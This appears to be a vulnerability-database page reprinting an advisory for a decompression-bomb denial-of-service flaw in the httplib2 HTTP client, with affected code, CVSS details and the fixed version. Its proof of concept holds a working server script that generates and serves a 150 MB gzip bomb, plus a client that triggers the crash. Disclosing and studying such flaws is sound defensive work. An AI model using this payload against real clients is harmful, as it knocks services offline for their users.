🛡️ CVE-2026-59939 — httplib2

🟠 CVSS 8.0 — High ⚠️ Exploit Public CWE-400 OSV
8.0
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

httplib2: Decompression Bomb Denial of Service via Unbounded gzip/deflate Response Handling

Summary

The httplib2 HTTP client library performs unbounded decompression of HTTP response bodies encoded with Content-Encoding: gzip or deflate. A malicious or compromised HTTP server can return a small compressed payload (approximately 150 KB) that expands to an arbitrarily large size in memory (150 MB or more), causing MemoryError or OOM-kill in the client process. This is a classic decompression bomb (zip bomb) attack against the HTTP client.

Any application using httplib2.Http().request() against untrusted or attacker-controlled HTTP endpoints is affected.

Details

Affected code: httplib2/__init__.py - _decompressContent() function

The decompression path has two unbounded operations:

1. gzip decompression (line 394):

```python

content = gzip.GzipFile(fileobj=io.BytesIO(new_content)).read()

```

The .read() call with no size argument decompresses the entire gzip payload into a single in-memory bytes object. There is no limit on the decompressed size.

2. deflate decompression (line 397):

```python

content = zlib.decompress(content, zlib.MAX_WBITS)

```

Similarly, zlib.decompress() returns the fully decompressed content as a single bytes object with no size bound.

3. Automatic invocation (line 1431): _decompressContent() is called automatically on every HTTP response that includes a Content-Encoding: gzip or deflate header. The full compressed body is already buffered in memory via response.read() before decompression begins.

Root cause: There is no max_decompressed_size, streaming decompression with size tracking, or decompression ratio check anywhere in the decompression path. The library unconditionally trusts the server's compressed payload size.

Attack vector: Any HTTP server (including man-in-the-middle attackers or compromised upstream services) can trigger this by returning a response with:

  • Content-Encoding: gzip header
  • A small compressed body that decompresses to an arbitrarily large size

Proof of Concept

Step 1 - Start a malicious HTTP server that serves a gzip decompression bomb:

```python

#!/usr/bin/env python3

"""Malicious HTTP server that serves a gzip decompression bomb."""

import gzip

import http.server

import io

import socketserver

UNCOMPRESSED_SIZE = 150 * 1024 * 1024 # 150 MB

def make_payload():

"""Create a gzip payload: ~150 KB compressed -> 150 MB decompressed."""

buf = io.BytesIO()

with gzip.GzipFile(fileobj=buf, mode="wb", compresslevel=9) as gz:

chunk = b"A" * (1024 * 1024) # 1 MB of repeating bytes

for _ in range(UNCOMPRESSED_SIZE // len(chunk)):

gz.write(chunk)

return buf.getvalue()

PAYLOAD = make_payload()

class Handler(http.server.BaseHTTPRequestHandler):

def do_GET(self):

self.send_response(200)

self.send_header("Content-Type", "application/octet-stream")

self.send_header("Content-Encoding", "gzip")

self.send_header("Content-Length", str(len(PAYLOAD)))

self.end_headers()

self.wfile.write(PAYLOAD)

def log_message(self, fmt, *args):

pass

with socketserver.TCPServer(("127.0.0.1", 8000), Handler) as httpd:

print(f"Bomb server ready: {len(PAYLOAD)} bytes compressed -> "

f"{UNCOMPRESSED_SIZE} bytes decompressed")

httpd.serve_forever()

```

Step 2 - Run the httplib2 client (in a separate terminal):

```python

#!/usr/bin/env python3

"""Client that demonstrates MemoryError from httplib2 decompression bomb."""

import resource

import httplib2

# Set a 180 MB memory limit to make the crash deterministic

LIMIT_MB = 180

limit = LIMIT_MB * 1024 * 1024

resource.setrlimit(resource.RLIMIT_AS, (limit, limit))

http = httplib2.Http(timeout=5)

try:

response, content = http.request("http://127.0.0.1:8000/")

print(f"Unexpected success: received {len(content)} bytes")

except MemoryError:

print(f"MemoryError confirmed: decompression bomb exhausted "

f"{LIMIT_MB} MB memory limit")

# This is the expected outcome - the 150 KB compressed payload

# expanded to 150 MB during decompression, exceeding the limit.

```

Expected output (client):

```

MemoryError confirmed: decompression bomb exhausted 180 MB memory limit

```

Reproduction metrics:

  • Compressed payload size: 152,908 bytes (~150 KB)
  • Decompressed size: 157,286,400 bytes (150 MB)
  • Amplification ratio: ~1,029x
  • Client memory limit: 180 MB -> MemoryError triggered during gzip.GzipFile.read()

Impact

Severity: High

Any application using httplib2 to make HTTP requests to untrusted servers is vulnerable. The attack requires no authentication, no special configuration, and no user interaction - the server simply returns a crafted gzip-compressed response.

| Parameter | Value |

|---|---|

| Compressed payload | ~150 KB |

| Decompressed size | 150 MB (config

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs no privileges on the target. No user interaction is required. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality none, integrity none, availability high.

Weakness class

CVE-2026-59939 is classified as CWE-400: Uncontrolled Resource Consumption. A request can consume memory, CPU or storage without limit, exhausting capacity for everyone else.

Affected software

CVE-2026-59939 is recorded against 1 package.

  • httplib2 (fixed in 0.32.0)

Timeline and source

Published on 24 July 2026 and last revised on 25 July 2026. A public exploit is known to exist, which raises the urgency of patching considerably. A vendor advisory or fix has been published. Record sourced from OSV.

References

github.com (Web)
nvd.nist.gov (Advisory)
github.com (Web)
github.com (Package)
github.com (Web)
github.com (Web)

Details

Severity HIGH
CVSS Score 8.0
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE CWE-400
Public Exploit ⚠️ Yes
Source OSV
Published 2026-07-24
Updated 2026-08-12
Modified 2026-07-25

Affected Packages

Software From version Fixed in
httplib2 0.32.0

Similar Threats

Exploit Protection

Are you running httplib2?

CVE-2026-59939 carries CVSS 8.0 High rating and a public exploit already exists. BotEraser checks your installation against this and other known CVE records, and blocks IPs associated with exploit activity.

Check My Site For CVE-2026-59939 →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.